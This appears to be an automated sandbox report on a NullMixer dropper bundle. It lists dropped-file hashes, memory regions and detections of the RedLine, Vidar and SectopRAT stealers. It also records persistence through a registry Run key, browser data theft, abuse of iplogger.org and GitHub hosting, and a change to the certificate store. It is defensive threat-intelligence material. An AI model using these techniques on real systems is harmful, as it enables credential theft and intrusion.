SHA256 9e1a149370efe9814bf2cbd87acfcfa410d1769efd86a9722da4373d6716d22e
SHA512 8d99ab09e84e4ef309da34be94946cbfcffeb1c0ca49e2452deb738d801e551062ebb134f1b99a9baf03003a8e720d525521ce09aeac341d3cba3fcfbc618fb5

memory/3744-55-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3744-53-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3744-52-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3744-51-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3744-47-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3744-46-0x000000006494A000-0x000000006494F000-memory.dmp

memory/3744-44-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3744-43-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/3744-38-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/4948-121-0x00000000052F0000-0x000000000538C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

MD5 ad0aca1934f02768fd5fedaf4d9762a3
SHA1 0e5b8372015d81200c4eff22823e854d0030f305
SHA256 dc10f50f9761f6fbafe665e75a331b2048a285b1857ad95e0611ace825cba388
SHA512 2fba342010ba85440784190245f74ea9e7c70974df12c241ccb6b72a6e1006a72bd1fa2e657f434d7479758f9508edb315398f6e95d167a78b788cea732be3b7

memory/2180-138-0x0000000000010000-0x0000000000020000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 01ad10e59fa396af2d5443c5a14c1b21
SHA1 f209a4f0bb2a96e3ee6a55689e7f00e79c04f722
SHA256 bef1cffaba8186ce62265e0b322ca9fd9326a8929591df569a4953456c752137
SHA512 1e067ade999ff933a644fde66c6ab9abb8a960ce1c8064368adcde4c09d924bd22d1b43c68b7c968e982fc75937969a2876e9e2a024f72e693f9ba397d449e02

memory/4948-120-0x0000000005130000-0x000000000513A000-memory.dmp

memory/3692-143-0x0000000002230000-0x0000000002314000-memory.dmp

memory/2676-155-0x0000000000400000-0x00000000004E4000-memory.dmp

memory/3744-165-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/3744-171-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3744-170-0x0000000001420000-0x00000000014AF000-memory.dmp

memory/3744-169-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3744-161-0x0000000000400000-0x0000000000A07000-memory.dmp

memory/3744-168-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3744-167-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2104-173-0x0000000000400000-0x00000000032F3000-memory.dmp

memory/4948-174-0x0000000002710000-0x0000000002722000-memory.dmp

memory/1016-184-0x0000000000400000-0x0000000003346000-memory.dmp

memory/2180-185-0x00000000025F0000-0x00000000025FE000-memory.dmp

memory/2180-186-0x0000000002620000-0x0000000002632000-memory.dmp

memory/4948-199-0x0000000009020000-0x00000000090AC000-memory.dmp

memory/4948-200-0x0000000005430000-0x000000000544E000-memory.dmp

memory/2040-202-0x0000000000400000-0x000000000041E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1cr.exe.log

MD5 8ec831f3e3a3f77e4a7b9cd32b48384c
SHA1 d83f09fd87c5bd86e045873c231c14836e76a05c
SHA256 7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982
SHA512 26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3

memory/4648-209-0x0000000002B60000-0x0000000002B96000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

MD5 a628baa97881fa5528009c9470cadee0
SHA1 583aa730e302fe0015cdb0dee4e279f193d66d87
SHA256 e2bb9ee3616cd827cc3ee297cbe24cfbd2ded4d9efe894e68453f6cfbf18e4c5
SHA512 c84e496e13d30c24efd020f25f4cd55b6157feb529f7285d97445c386fd50a50e943b0f67745a861a97c5bf0c4ff7dee7b5240d52c59b66421a9bdc26de58faf

memory/2040-212-0x0000000005DF0000-0x0000000006408000-memory.dmp

memory/2040-213-0x0000000003230000-0x0000000003242000-memory.dmp

memory/2040-214-0x0000000005850000-0x000000000588C000-memory.dmp

memory/4648-215-0x00000000057B0000-0x0000000005DD8000-memory.dmp

memory/2040-216-0x0000000005890000-0x00000000058DC000-memory.dmp

memory/4648-217-0x00000000055A0000-0x00000000055C2000-memory.dmp

memory/4648-219-0x00000000056B0000-0x0000000005716000-memory.dmp

memory/4648-218-0x0000000005640000-0x00000000056A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vwvvhl0k.xs3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4648-229-0x0000000005EE0000-0x0000000006234000-memory.dmp

memory/2040-232-0x0000000005AD0000-0x0000000005BDA000-memory.dmp

memory/4648-233-0x0000000006470000-0x000000000648E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS299B.tmp\Install.cmd

MD5 a3c236c7c80bbcad8a4efe06a5253731
SHA1 f48877ba24a1c5c5e070ca5ecb4f1fb4db363c07
SHA256 9a9e87561a30b24ad4ad95c763ec931a7cfcc0f4a5c23d12336807a61b089d7d
SHA512 dc73af4694b0d8390bcae0e9fd673b982d2c39f20ca4382fddc6475a70891ce9d8e86c2501d149e308c18cd4d3a335cc3411157de23acf6557ed21578c5f49cc

memory/4648-235-0x0000000007440000-0x0000000007472000-memory.dmp

memory/4648-236-0x0000000074FB0000-0x0000000074FFC000-memory.dmp

memory/4648-246-0x0000000006A00000-0x0000000006A1E000-memory.dmp

memory/4648-248-0x0000000007680000-0x0000000007723000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 a0486d6f8406d852dd805b66ff467692
SHA1 77ba1f63142e86b21c951b808f4bc5d8ed89b571
SHA256 c0745fd195f3a51b27e4d35a626378a62935dccebefb94db404166befd68b2be
SHA512 065a62032eb799fade5fe75f390e7ab3c9442d74cb8b520d846662d144433f39b9186b3ef3db3480cd1d1d655d8f0630855ed5d6e85cf157a40c38a19375ed8a

memory/4648-254-0x0000000007DE0000-0x000000000845A000-memory.dmp

memory/4648-255-0x00000000077A0000-0x00000000077BA000-memory.dmp

memory/4648-256-0x0000000007810000-0x000000000781A000-memory.dmp

memory/4648-266-0x0000000007A20000-0x0000000007AB6000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 dc058ebc0f8181946a312f0be99ed79c
SHA1 0c6f376ed8f2d4c275336048c7c9ef9edf18bff0
SHA256 378701e87dcff90aa092702bc299859d6ae8f7e313f773bf594f81df6f40bf6a
SHA512 36e0de64a554762b28045baebf9f71930c59d608f8d05c5faf8906d62eaf83f6d856ef1d1b38110e512fbb1a85d3e2310be11a7f679c6b5b3c62313cc7af52aa

\??\pipe\LOCAL\crashpad_3076_JQQLSOGSOTFHNEIW

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 efe4c40a4047904ba49903c0916832ab
SHA1 7ca7e3712f047343e52d753648f6f7c4787f3706
SHA256 6aa35055139b97ceb0f01a2a6f78ac175d19bdd0b7366c98d6f5da567cc8a4a4
SHA512 4455845884f5f273e50bd34910078caa442971dff64d295994c9d2c2d0cc68301a3a88bdae70e97f49e8ad87a2779d23a2215afab2a446b1843d278e5c3c6b45

memory/4648-274-0x00000000079A0000-0x00000000079B1000-memory.dmp

memory/4648-275-0x00000000079D0000-0x00000000079DE000-memory.dmp

memory/4648-276-0x00000000079E0000-0x00000000079F4000-memory.dmp

memory/4648-277-0x0000000007AE0000-0x0000000007AFA000-memory.dmp

memory/4648-278-0x0000000007AC0000-0x0000000007AC8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 4119bdbeae429197de1d78250e3a89a6
SHA1 bd2a79c82540eccf13e14e657a4dd21f4a90b6f6
SHA256 8db4af0bdfe9b061291db46510b8c5a4abe0bcd0d2e3ac0dde9a21eb8fbfa372
SHA512 fe468d5bc2c39efcaa0e309b2f51ad9c66e810d7ce7687e744de4ce01f5036da02fc70159aeeb9a0a827c9d7987b9e52f2f949f1a65fef6740716904dc57c34b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 1e7dc506a2b8ed7ed0fcb8d42619fe5d
SHA1 9d332b0a8724087c0e93611473b1d0e278d82301
SHA256 d91f02b5e6b1f70abf110663d378d1f655d137b7b515ab737dccc3435c9926ba
SHA512 2dc6018f38e6a66aaaf92038de692fdbca033932663adfa4320e16ca791cdddb9befe0844686a269e0dddcb5869021476283009a9e188171c2ba5a8f1361c5be

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 be0b4b1c809dc419f44b990378cbae31
SHA1 5c40c342e0375d8ca7e4cc4e1b81b7ef20a22806
SHA256 530bd3b9ec17f111b0658fddeb4585cd6bf6edb1561bdebd1622527c36a63f53
SHA512 5ce316cfe5e25b0a54ceb157dee8f85e2c7825d91a0cd5fae0500b68b85dd265903582728d4259428d2e44b561423dac1499edcf0606ac0f78e8485ce3c0af24

memory/5648-326-0x0000000000F60000-0x0000000000F66000-memory.dmp

memory/5796-332-0x0000000000A30000-0x0000000000A50000-memory.dmp

memory/5796-329-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5796-331-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5796-336-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5796-337-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5796-335-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5796-333-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5796-334-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5796-338-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5796-339-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5796-366-0x0000000140000000-0x0000000140786000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 4bc8a3540a546cfe044e0ed1a0a22a95
SHA1 5387f78f1816dee5393bfca1fffe49cede5f59c1
SHA256 f90fcadf34fbec9cabd9bcfdea0a63a1938aef5ea4c1f7b313e77f5d3f5bbdca
SHA512 e75437d833a3073132beed8280d30e4bb99b32e94d8671528aec53f39231c30476afb9067791e4eb9f1258611c167bfe98b09986d1877ca3ed96ea37b8bceecf

Analysis: behavioral3

Detonation Overview

Submitted

2024-12-06 12:12

Reported

2024-12-06 12:15

Platform

win7-20240903-en

Max time kernel

63s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Vidar

stealer vidar

Vidar family

vidar

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\c0f099be1ace2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\c0f099be1ace2.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\621c13b77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\621c13b77.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\3d1f9c2a6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\3d1f9c2a6.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\09b9624c6ac9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\09b9624c6ac9.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\09b9624c6ac9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\09b9624c6ac9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\09b9624c6ac9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\c0f099be1ace2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\c0f099be1ace2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\7zS406F7727\e4f0738cc5646a38.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.db-ip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.db-ip.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2992 set thread context of 868 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS406F7727\c0f099be1ace2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS406F7727\3d1f9c2a6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS406F7727\621c13b77.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS406F7727\d55cc0d45c3a05.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS406F7727\09b9624c6ac9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS406F7727\09b9624c6ac9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7AE71BD1-B3CB-11EF-A5D8-F2DF7204BD4F} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\7zS406F7727\621c13b77.exe N/A
